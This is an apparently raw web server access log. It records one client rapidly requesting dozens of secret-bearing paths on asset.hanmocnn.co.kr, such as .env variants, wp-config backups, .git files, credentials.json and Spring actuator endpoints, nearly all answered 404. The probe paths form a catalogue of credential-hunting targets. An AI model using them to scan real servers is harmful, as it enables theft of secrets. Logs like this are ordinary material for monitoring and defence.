[15/Feb/2026:00:18:25 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.git/config" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:26 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.git/HEAD" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:26 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-config.php.bak" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:26 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-config.php.old" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:27 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-config.php.txt" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:27 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-config.php.save" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:27 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-config.php~" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:28 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-content/debug.log" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:28 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.dev" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:28 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.staging" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:29 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.backup" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:29 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.old" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:29 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.save" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:29 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/credentials.json" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:30 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/credentials.json.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:30 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.vscode/sftp.json" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:30 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.vscode/sftp.json.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:30 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/docker-compose.yml" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:31 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 185.177.72.60] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:31 +0000] - - 400 - GET https asset.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-"
|
||||||
|
[15/Feb/2026:00:18:31 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 185.177.72.60] [Length 17770] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:32 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/js/app.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:32 +0000] - - 400 - GET https asset.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-"
|
||||||
|
[15/Feb/2026:00:18:32 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/index.html" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:32 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/checkout" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:32 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/robots.txt" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:32 +0000] - - 400 - GET https asset.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-"
|
||||||
|
[15/Feb/2026:00:18:33 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/sitemap.xml" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:33 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:33 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:33 +0000] - - 400 - GET https asset.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-"
|
||||||
|
[15/Feb/2026:00:18:33 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.vite" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:34 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/backend/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:34 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/laravel/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:34 +0000] - - 400 - GET https asset.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-"
|
||||||
|
[15/Feb/2026:00:18:34 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/payment/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:35 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/admin/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:35 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.example" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:35 +0000] - - 400 - GET https asset.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-"
|
||||||
|
[15/Feb/2026:00:18:35 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/core/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:35 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:36 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/stripe/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:36 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.production" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:36 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.bak" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:36 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.local" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/assets/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/app/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/config.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/docker/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/config.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/config.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/main.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:39 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/main.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:39 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/env.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:39 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/env.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:39 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/app.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:40 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/app.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:40 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/constants.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:40 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/constants.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:41 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/bundle.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:41 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/bundle.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:41 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/index.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:42 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/index.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:42 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/@vite/client" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:43 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__env.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:43 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__env.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:43 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/vendor.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:43 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/vendor.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:44 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/stripe.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:44 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/stripe.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:44 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/checkout.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:44 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/checkout.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:45 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/payment.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:45 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/payment.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:45 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/sw.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:45 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/sw.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:46 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/config.json" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:46 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/config.json.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:46 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/env.json" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:47 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/env.json.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:47 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.vite/manifest.json" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:47 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.vite/manifest.json.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:48 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.git/HEAD" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:48 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-config.php.bak" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:48 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-config.php.old" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:48 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-config.php.txt" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:49 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-config.php.save" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:49 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-config.php~" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:49 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-content/debug.log" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:49 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.dev" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:50 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.staging" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:50 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.backup" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:50 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.old" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:50 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.save" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:51 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/credentials.json" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:51 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/credentials.json.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:51 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/actuator/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:51 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.vscode/sftp.json" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:51 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/actuator/configprops" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:52 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/manage/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:52 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/manage/configprops" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:52 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/actuator/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:52 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/admin/actuator/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:53 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/v1/actuator/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:53 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/v2/actuator/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
